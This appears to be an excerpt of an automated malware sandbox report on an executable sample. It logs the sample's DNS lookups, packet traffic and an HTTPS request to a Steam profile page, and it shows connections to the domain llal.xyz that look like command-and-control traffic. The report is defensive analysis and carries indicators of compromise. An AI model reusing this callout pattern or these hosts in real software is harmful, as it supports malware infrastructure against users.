                                                                                                                      GetHandleVerifier10x4a8670

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      ChineseTaiwan
                                                                                                                      CzechCzech Republic
                                                                                                                      GermanGermany
                                                                                                                      EnglishUnited States
                                                                                                                      FrenchFrance
                                                                                                                      ItalianItaly
                                                                                                                      JapaneseJapan
                                                                                                                      PortugueseBrazil
                                                                                                                      RussianRussia
                                                                                                                      TurkishTurkey
                                                                                                                      UkrainianUkrain
                                                                                                                      KazakhKazakhstan
                                                                                                                      ChineseChina
                                                                                                                      PortuguesePortugal

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jun 1, 2024 17:42:01.302602053 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:01.302642107 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:01.302727938 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:01.413278103 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:01.413326025 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.252827883 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.253309965 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.305669069 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.305694103 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.306052923 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.306113005 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.307862997 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.348499060 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.886069059 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.886101007 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.886121035 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.886145115 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.886171103 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.886195898 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.886228085 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.907689095 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.907712936 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.907764912 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.907785892 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.907803059 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.907819033 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.921264887 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.921324015 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.921341896 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.921386003 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.921399117 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.921468973 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.921808958 CEST49708443192.168.2.10104.102.42.29
                                                                                                                      Jun 1, 2024 17:42:02.921827078 CEST44349708104.102.42.29192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.984509945 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:02.984556913 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.984705925 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:02.984961987 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:02.984988928 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:03.597614050 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:03.598160028 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:03.601814985 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:03.601828098 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:03.602229118 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:03.602447987 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:03.602801085 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:03.644504070 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093252897 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093302011 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093353987 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093409061 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.093410015 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.093430996 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093451023 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.093466997 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093502045 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093565941 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.093565941 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.093565941 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.093574047 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.093636990 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.116902113 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.118266106 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.126771927 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.126948118 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.126976013 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127300024 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.127300024 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.127321005 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127366066 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127590895 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.127598047 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127610922 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127656937 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127672911 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.127682924 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127692938 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.127734900 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.128371954 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.128427029 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.128434896 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.128443003 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.128468990 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.128500938 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.128519058 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.128539085 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.128551006 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129300117 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129332066 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129352093 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129389048 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129389048 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129389048 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129399061 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129522085 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129540920 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129795074 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.243433952 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.243513107 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.243542910 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.244507074 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.244507074 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.244524002 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.248516083 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.254582882 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254663944 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254693985 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254719019 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254735947 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.254746914 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254826069 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.254826069 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254826069 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.255002022 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.256515026 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.256545067 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.376463890 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.376502991 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.378571033 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.378571033 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.378624916 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.988820076 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990191936 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990210056 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990220070 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990226984 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.377907038 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.378036976 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378050089 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.378081083 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.378110886 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378218889 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378218889 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378218889 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.612850904 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.612914085 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:06.613009930 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.613226891 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.613241911 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.212759018 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.212923050 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213341951 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213354111 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.213532925 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213546991 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.213630915 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213646889 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.213684082 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213686943 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606257915 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606328011 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606337070 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606394053 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606455088 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606477976 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606506109 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606527090 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.748660088 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.748692036 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:08.748775959 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.749193907 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.749209881 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.357518911 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.357686996 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358241081 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358247995 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.358442068 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358448029 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.358608007 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358624935 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.358738899 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358745098 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733045101 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733118057 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733125925 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733179092 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733278990 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733297110 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733311892 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733342886 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819395065 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819442034 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:10.819531918 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819852114 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819865942 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.425451994 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.425524950 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.425940990 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.425949097 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.426127911 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.426132917 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.426294088 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.426294088 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.426310062 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.426318884 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819138050 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819209099 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819386005 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819386959 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819580078 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819580078 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819607019 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819659948 CEST49713443192.168.2.10188.114.97.3

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jun 1, 2024 17:42:01.288255930 CEST5270853192.168.2.101.1.1.1
                                                                                                                      Jun 1, 2024 17:42:01.297350883 CEST53527081.1.1.1192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:02.968707085 CEST6408653192.168.2.101.1.1.1
                                                                                                                      Jun 1, 2024 17:42:02.983206987 CEST53640861.1.1.1192.168.2.10

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jun 1, 2024 17:42:01.288255930 CEST192.168.2.101.1.1.10x3743Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                      Jun 1, 2024 17:42:02.968707085 CEST192.168.2.101.1.1.10xf6a2Standard query (0)llal.xyzA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jun 1, 2024 17:42:01.297350883 CEST1.1.1.1192.168.2.100x3743No error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false
                                                                                                                      Jun 1, 2024 17:42:02.983206987 CEST1.1.1.1192.168.2.100xf6a2No error (0)llal.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                      Jun 1, 2024 17:42:02.983206987 CEST1.1.1.1192.168.2.100xf6a2No error (0)llal.xyz188.114.96.3A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • steamcommunity.com
                                                                                                                      • llal.xyz

                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.1049708104.102.42.294437584C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-06-01 15:42:02 UTC206OUTGET /profiles/76561199619938930 HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: steamcommunity.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-06-01 15:42:02 UTC1870INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:02 GMT
                                                                                                                      Content-Length: 34764
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: sessionid=872facd2b398d80218604df1; Path=/; Secure; SameSite=None
                                                                                                                      Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                      2024-06-01 15:42:02 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                      2024-06-01 15:42:02 UTC16384INData Raw: 61 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72
                                                                                                                      Data Ascii: av" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'super
                                                                                                                      2024-06-01 15:42:02 UTC3768INData Raw: 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09
                                                                                                                      Data Ascii: ;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script>
                                                                                                                      2024-06-01 15:42:02 UTC98INData Raw: 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
